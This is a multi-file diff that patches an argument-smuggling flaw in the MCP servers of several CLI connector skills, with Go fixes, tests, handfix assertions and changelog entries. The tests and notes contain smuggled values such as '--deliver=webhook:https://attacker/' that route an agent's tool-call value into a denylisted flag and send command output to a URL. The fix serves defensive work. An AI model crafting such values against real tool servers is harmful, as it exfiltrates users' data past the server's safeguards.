+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/betterstack/handfixes.json
+++ b/skills/betterstack/handfixes.json
@@ -197,6 +197,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/betterstack/handfixes.json
+++ b/skills/betterstack/handfixes.json
@@ -212,8 +212,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -223,7 +235,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/blumira/CHANGELOG.md
+++ b/skills/blumira/CHANGELOG.md
@@ -12,9 +12,11 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  The recipe shortcut tools, which build their own command line, now also refuse a value
+  that begins with `-` where a plain value is expected.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/blumira/CHANGELOG.md
+++ b/skills/blumira/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   The recipe shortcut tools, which build their own command line, now also refuse a value
   that begins with `-` where a plain value is expected.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.

--- a/skills/blumira/CHANGELOG.md
+++ b/skills/blumira/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/blumira/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/blumira/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/blumira/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/blumira/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/blumira/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/blumira/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/blumira/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/blumira/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/blumira/cli/internal/mcp/intents.go
+++ b/skills/blumira/cli/internal/mcp/intents.go
@@ -74,10 +74,10 @@ func appendRecipeStringFlag(args []string, name string, value any, defaultValue 
 	if selected == "" {
 		return args, required
 	}
-	if useEquals {
-		return append(args, "--"+name+"="+selected), false
-	}
-	return append(args, "--"+name, selected), false
+	// Hand-wired (handfixes.json: mcp-recipe-argv-not-flag-like): always
+	// joined, so a value can never be parsed as a second flag; useEquals is
+	// kept only for the generated call sites.
+	return append(args, "--"+name+"="+selected), false
 }
 
 func appendRecipeBoolFlag(args []string, name string, value any, defaultValue bool) []string {

--- a/skills/blumira/handfixes.json
+++ b/skills/blumira/handfixes.json
@@ -183,6 +183,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/blumira/handfixes.json
+++ b/skills/blumira/handfixes.json
@@ -198,8 +198,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -209,7 +221,32 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
+    }
+   ]
+  },
+  {
+   "id": "mcp-recipe-argv-not-flag-like",
+   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs.",
+   "why": "Found by Codex adversarial review of the fleet mcp-argv-value-joined backport (2026-09-09): the recipe path had the same key-only gap. A recipe positional is appended to argv AHEAD of the recipe's own flags, so {\"domain\": \"--deliver=webhook:https://attacker/\"} became `exceptions find --deliver=webhook:... --agent` and pflag parsed the value as the denylisted root flag (and {\"domain\": \"--dry-run\"} demonstrably changed execution). The split appendRecipeStringFlag branch was safe only because its one caller's flag is a string flag that consumes the next token; a future NoOptDefVal flag would reopen it. Upstream cli-printing-press be378adf (#4647) fixed cliArgsFromMCP but NOT this recipe path, so a reprint REINTRODUCES it while go build and go test stay green; this entry is what notices. Mirrors cobratree.validatePositionalArgsForMCP, which already applies this rule to the raw args field. Retire only when the press generator refuses flag-like recipe positionals itself.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "return append(args, \"--\"+name+\"=\"+selected), false",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "not_contains": "\"--\"+name, selected"
     }
    ]
   }

--- a/skills/cipp/CHANGELOG.md
+++ b/skills/cipp/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.5] - 2026-09-01

--- a/skills/cipp/CHANGELOG.md
+++ b/skills/cipp/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.5] - 2026-09-01
 

--- a/skills/cipp/CHANGELOG.md
+++ b/skills/cipp/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.6]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.5] - 2026-09-01
 
 ### Added

--- a/skills/cipp/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/cipp/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/cipp/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/cipp/cli/internal/mcp/cobratree/shellout.go
@@ -203,6 +203,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -212,10 +219,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -223,11 +230,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/cipp/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/cipp/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/cipp/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/cipp/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
